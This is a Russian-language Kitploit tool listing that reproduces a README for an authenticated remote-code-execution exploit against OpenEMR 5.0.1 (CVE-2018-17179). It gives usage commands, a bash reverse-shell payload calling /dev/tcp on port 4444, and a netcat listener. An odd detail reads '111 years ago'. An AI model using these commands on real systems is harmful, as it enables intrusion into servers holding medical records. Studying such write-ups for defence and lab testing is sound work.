Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-17179-OpenEMR — Эксплойт для аутентифицированного удаленного выполнения кода для OpenEMR 5.0.1 (CVE-2018-17179) с настраиваемыми полезными нагрузками команд и поддержкой reverse shell для образовательного тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/cyberquestor-infosec/cve-2018-17179-openemr
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubcyberquestor-infosec/cve-2018-17179-openemr

CVE-2018-17179-OpenEMR

Эксплойт для аутентифицированного удаленного выполнения кода для OpenEMR 5.0.1 (CVE-2018-17179) с настраиваемыми полезными нагрузками команд и поддержкой reverse shell для образовательного тестирования на проникновение.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-17179-OpenEMR

⚠️ Отказ от ответственности
Этот репозиторий предназначен строго для образовательных и исследовательских целей.
Предоставленная информация и код могут использоваться только в контролируемых средах, например, на частных лабораторных машинах.

Несанкционированное использование этого кода против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.


🔍 Об уязвимости

CVE-2018-17179 затрагивает OpenEMR — широко используемое программное обеспечение с открытым исходным кодом для ведения электронных медицинских записей и управления практикой.
Ошибка в механизме аутентификации конечной точки rest_routes.php позволяет аутентифицированному пользователю выполнять произвольные команды на сервере.

Это может привести к удаленному выполнению кода (RCE) в контексте пользователя веб-сервера.

  • Тип уязвимости: Аутентифицированное удаленное выполнение кода
  • Затрагиваемый компонент: interface/main/main_screen.php через rest_routes.php
  • Требуется аутентификация: ✅ Да
  • Серьезность: Критическая
  • Оценка CVSS: 9.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

  • 🧾 Ссылки

    • Exploit-DB Entry – 45161
    • OpenEMR GitHub Repository
    • CVE Details – CVE-2018-17179
    • NVD CVE Report

    🛠 Обзор эксплойта

    Этот репозиторий содержит модифицированную версию публичного эксплойта с Exploit-DB:

    • Название эксплойта: OpenEMR 5.0.1 – Authenticated RCE
    • ID ExploitDB: 45161
    • Язык: Python 2
    • Требуется аутентификация: Да

    В этой модифицированной версии:

    • Вы можете напрямую указать свою полезную нагрузку с командой (например, обратную оболочку).
    • Эксплойт поддерживает чистый запуск из командной строки для гибкости.
    • Чувствительные поля, такие как генерация куки сессии и логика внедрения команды, сохранены из оригинала.

    💥 Демонстрация

    🔐 Страница входа

    Целевая тестовая панель входа OpenEMR локально:

    Login Page


    📂 Использование эксплойта

    Использование: python2 exploit.py <target_url> -u -p -c

    Пример: python2 exploit.py http:///openemr -u admin -p secretpass -c 'id'

    root@kitploit:~
    
    - Убедитесь, что у вас установлен Python 2.
    - Пользователь должен иметь доступ к уязвимой конечной точке `rest_routes.php`.
    
    

    Запуск эксплойта

    Запустил модифицированный скрипт эксплойта с полезной нагрузкой в виде bash-обратной оболочки:

    root@kitploit:~
    python2 exploit.py http://<target>/openemr -u <username> -p <password> -c 'bash -i >& /dev/tcp/<your-ip>/4444 0>&1'
    

    Exploit Output

    Шаг 3 – Получение обратной оболочки

    Слушатель Netcat на порту 4444 успешно получил обратную оболочку:

    root@kitploit:~
    nc -nvlp 4444
    

    Exploit Output

    📖 Блог на Medium

    Ознакомьтесь с подробным руководством и теорией в моей статье на Medium:
    👉 Читать блог на Medium

    Скачать инструмент